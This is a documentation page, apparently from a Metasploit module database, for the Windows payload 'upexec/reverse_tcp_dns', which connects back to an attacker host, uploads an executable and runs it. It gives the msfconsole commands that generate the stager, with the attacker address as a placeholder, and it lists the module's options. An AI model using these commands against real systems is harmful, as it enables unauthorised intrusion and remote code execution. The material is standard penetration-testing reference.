Windows Upload/Execute, Reverse TCP Stager (DNS) | Metasploit Exploit Database (DB)

Windows Upload/Execute, Reverse TCP Stager (DNS)

Connect back to the attacker, Uploads an executable and runs it (staged)

Search Other Modules


Rank

  • Normal

Authors

  • vlad902 < vlad902 [at] gmail.com >
  • sf < stephen_fewer [at] harmonysecurity.com >
  • hdm < hdm [at] metasploit.com >
  • skape < mmiller [at] hick.org >

Similar Modules


Usage Information

$ msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

msf > use payload/windows/upexec/reverse_tcp_dns
msf payload(reverse_tcp_dns) > set LHOST [MY IP ADDRESS]
msf payload(reverse_tcp_dns) > set PEXEC [PATH]
msf payload(reverse_tcp_dns) > generate


Module Options

EXITFUNC Exit technique: process, thread, none, seh (default: process)
LHOST The DNS hostname to connect back to
LPORT The listen port (default: 4444)
PEXEC Full path to the file to upload and execute
AutoRunScript A script to run automatically on session creation.
InitialAutoRunScript An initial script to run on session creation (before AutoRunScript)
ReverseConnectRetries The number of connection attempts to try before exiting the process
ReverseListenerBindAddress The specific IP address to bind to on the local system
ReverseListenerComm The specific communication channel to use for this listener
VERBOSE Enable detailed status messages
WORKSPACE Specify the workspace for this module